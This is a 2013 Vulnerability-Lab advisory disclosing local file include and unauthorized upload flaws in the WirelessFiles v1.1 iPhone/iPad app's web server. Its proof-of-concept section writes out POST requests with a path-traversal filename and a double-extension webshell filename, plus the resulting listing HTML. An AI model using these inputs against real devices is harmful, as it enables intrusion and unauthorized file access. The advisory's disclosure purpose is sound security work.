WirelessFiles version 1.1 suffers from local file inclusion and remote file access vulnerabilities.
3850602449bad921852b410c589969cec88b5db971be283eacaa3ba68c2677a6
Title:
======
WirelessFiles v1.1 iPad iPhone - Multiple Web Vulnerabilities
Date:
=====
2013-02-06
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=847
VL-ID:
=====
848
Common Vulnerability Scoring System:
====================================
7.5
Introduction:
=============
This application starts a web server on your device and allows downloads and uploads of any files from it using any browser on any
other computer or device. No cables, drivers or clients are necessary, just a browser.
Right from this application you can send these files to any other application ready to accept this file type. Or, you can send the
files to Wireless Files for further download to your computer. There is no problems with national file names.
With this program You have web access to photos and videos on your device. Show your photos in a nice Web Album on big screen without
cables and so on. For that, you need to enter your web-server from any computer using LAN or WWAN address. Just type one of the
indicated addresses in the address bar of your browser (Internet Explorer, Mozilla Firefox, Safari or any others). Also, you can start
WirelessFiles on one device, enter the web-server in your browser from another device, and transfer your photos,for example,to the
first device, and then put them in Camera Roll. (The transfer of photos to and from Camera Roll is available only in iOS 6 and up).
For all this to work, you need to have a working connection to the network where your device is located.
For LAN,It usually works right on the spot, if you have a modem or Wi-Fi router. If you have an AccessPoint (AP) connected to your
modem or router, you will need to switch the AP to the bridge mode in order to join the local network and Wi-Fi network into one. In
case you experience problems with connection, contact a specialist – this can be easily adjusted. It’s much harder with WWAN. It’s a
network access point provided by your cell network operator. As a rule, you cannot connect your computer to your device using WWAN.
Still, if Internet access on your computer is provided by the same operator, everything will get connected and running.
The application wouldn’t work in the background, so it switches off autoblocking while running. Any unexpected calls will
interrupt your file transfer. By default, the application allows storing a limited number of files – no more than 3 of them;
with the size of each not more than 10 MB. But you can remove all these limitations at the minimal price of $0.99 / €0.89.
Second limitation - program show only 10 first photos in webalbum, remove this limitation - $0.99 / €0.89.
Still, if something isn’t working, DO NOT buy removal of restrictions – this will not improve operability of the system itself.
Pay ONLY in case everything works, and you need to store more than 3 files or larger size. The application include basic protection
of the web-server from unauthorized access.
(Copy of the Homepage: https://itunes.apple.com/de/app/wirelessfiles/id573161053 )
Abstract:
=========
The Vulnerability Laboratory Research Team discovered a local file include vulnerability in the mobile WirelessFiles v1.1 app for the apple ipad & iphone.
Report-Timeline:
================
2013-02-06: Public Disclosure
Status:
========
Published
Affected Products:
==================
Apple AppStore
Product: WirelessFiles Application - (iPad & iPhone) 1.1
Exploitation-Technique:
=======================
Remote
Severity:
=========
High
Details:
========
A local file include web vulnerability via POST request method is detected in the mobile WirelessFiles v1.1 app for the apple ipad & iphone.
The vulnerability allows remote attackers via POST method to inject local app webserver folders to request unauthorized local webserver files.
1.1
The main vulnerbility is located in the upload file submit formular of the webserver (http://192.168.0.10/) when processing to load a manipulated
filename via POST. The execution of the injected path or file request will occur when the attacker is watching the file index listing.
1.2
Attackers can also unauthorized implement mobile webshells by using a double filename extension (bild.js.php.jpg) when processing to upload (submit)
via POST request method. The attacker uploads a file with a double extension and access the file in the secound step via directory webserver listing
to compromise the apple iphone or ipad.
Exploitation of the local file include web vulnerability does not require user interaction but a low privileged user account (standard pass blank).
Successful exploitation of the local web vulnerability results in ipad or iphone compromise via file include attack.
Vulnerable Application(s):
[+] WirelessFiles - ITunes or AppStore (Apple)
Vulnerable Module(s):
[+] File Upload via Submit (Web Server) [Remote]
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Filename - Listing
[+] Webalbum Filename - Listing
Proof of Concept:
=================
1.1
The vulnerability can be exploited by remote attackers with low privileged application user account and without required user interaction.
For demonstration or reproduce ...
Local File Include - PoC (POST)
POSTDATA =-----------------------------200962619920015
Content-Disposition: form-data; name="value"; filename="../../../../cmd>home>tmp.png" # < Include Path & File
Content-Type: image/png
--
Authorization=Digest username="ben37", realm="defaultRealm@host.com", nonce="2D2E8D09-6502-4266-B95E-28EB15CA8896", uri="/",
response="9942037c9ddae787f56cadcdb7570c89", qop=auth, nc=00000014, cnonce="9cb396be6aa86cb3"
Review: Filename - (Upload) Listing
<tbody><tr class="styleZag">
<th scope="col" width="50%"><div align="left"> File Name</div></th>
<th scope="col" width="25%"><span>Date and Time</span></th>
<th scope="col" width="25%"><div align="right">Size</div></th>
</tr>
<tr class="styleRow">
<th scope="col" width="50%"><div align="left">
<a href="http://192.168.0.10/../../../../cmd>home>tmp.png?%00">
<../../../../cmd>home>tmp.png?%00">%20%20%20%20</a></div></th>
1.2
The vulnerability can be exploited by remote attackers with low privileged application user account and without required user interaction.
For demonstration or reproduce ...
Unauthroized File Upload/Access (Webshell)
POSTDATA =-----------------------------200962619920015
Content-Disposition: form-data; name="value"; filename="hacking.js.php.jpg" # < Include File with multiple file extensions
Content-Type: image/png
--
Authorization=Digest username="ben38", realm="defaultRealm@host.com", nonce="2D2E8D09-6502-4266-B95E-28EB15CA8896", uri="/",
response="9942037c9ddae787f56cadcdb7570c89", qop=auth, nc=00000014, cnonce="9cb396be6aa86cb3"
Review: Filename - (Upload) Listing
<tbody><tr class="styleZag">
<th scope="col" width="50%"><div align="left"> File Name</div></th>
<th scope="col" width="25%"><span>Date and Time</span></th>
<th scope="col" width="25%"><div align="right">Size</div></th>
</tr>
<tr class="styleRow">
<th scope="col" width="50%"><div align="left">
<a href="http://192.168.0.10/hacking.js.php.jpg"><a href=hacking.js.php.jpg></a>%20%20%20%20</a></div></th>
Risk:
=====
The security risk of the local file include web vulnerability and unauthorized file upload/access bug are estimated as high(+).
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
Copyright © 2012 | Vulnerability Laboratory
--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com